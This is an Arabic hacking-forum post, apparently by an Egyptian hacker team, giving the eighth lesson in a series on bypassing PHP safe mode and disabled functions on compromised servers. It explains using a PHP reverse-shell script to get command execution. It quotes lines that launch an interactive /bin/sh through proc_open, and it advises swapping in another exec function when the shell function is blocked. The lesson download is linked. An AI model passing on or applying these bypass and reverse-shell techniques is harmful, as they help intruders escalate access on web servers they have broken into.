حالة الموضوع:
مغلق
  1. Mr.Alsa3ek

    Mr.Alsa3ek Guest

    بسم الله الرحمن الرحيم

    :: الدرس الأربعون :: الجزأ الثامن تخطي الوضع الأمني و الدوال الممنوعة ( Disable functions & Safe mode) ::


    :: هذا الدرس يتطرق الى ::

    في هذا الجزأ الثامن والاخير من السلسلة الخاصة بالتخطي الوضع الامني والدوال الممنوعة المكونه 8 طرق ان شاء الله راح نتناولها سويا اتمنى التركيز فيها ومتابعتها والتطبيق عليها

    الطريقة الثامنة هتكون من خلال استخدام او استغلال خاصية الاتصال العكسي
    التي تتيح لك الهروب من تطبيق الاوامر من خلال مترجم الـ Php الخاص بالسيرفر
    طبعا تم ارفاق الاسكربت الخاص بعملية الاتصال وهوا مبرمج بلغة Php

    بس هذا الاسكربت هيعمل معاك في السيف مود فعلا بس فيه حالة ما اذا كانت دالة
    s h e l l غير ممنوعة في الدوال بمعنى اخر لما تحصل شل السيف مود او الوضع الامني مفعل ابحث عن دالة s h el l اذا ماهي موجوده ان شاء الله الاسكربت
    هيشتغل معاك وهتتخطى وتطبق الاوامر الي بدك هيا اما اذا موجوده تعرف ان
    الاسكربت مش هيقوم بالمطلوب منه طبعا لها حلول المشكلة هذي او تخطي
    وهيا اما استخدام اسكربت اخر للاتصال العكسي مبرمج بلغة اخرى مثل Perl
    وهذي لها درس ان شاء الله في تخطي مشاكل المخترقين او انك تتلاعب بالدوال
    بمعنى اخر تبحث عن دالة اخرى للتنفيذ الاوامر غير موجوده في الدوال الممنوعة
    وتستبدلها بالدالة
    ***** الموجوده في السطر 54
    $s h el l = 'uname -a; w; id; /bin/sh -i';
    وايضا السطر 113
    $process = proc_open(
    $s h el l, $descriptorspec, $pipes);

    اتمنى مشاهدت الدرس واتقان الطريقة والتطبيق عليها دعواتي لكم بالتوفيق .


    :: للتحميل الدرس ::

    http://www.mediafire.com/?39243hb2s7jq7hz

    تحيات الفريق للجميع

    نسأل الله العلي العظيم ان ينفع بينا وبيكم الأسلام والمسلمين

    اخوانكم TeaM HacKer Egypt
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة